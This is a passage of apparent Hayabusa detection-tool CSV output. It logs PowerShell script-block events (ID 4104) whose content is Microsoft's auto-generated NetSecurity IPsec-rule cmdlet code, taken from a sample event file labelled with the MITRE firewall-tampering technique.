[ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirew",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"} if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecRule' -Alias '*' function Copy-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirew",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"allInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contai",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"allInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 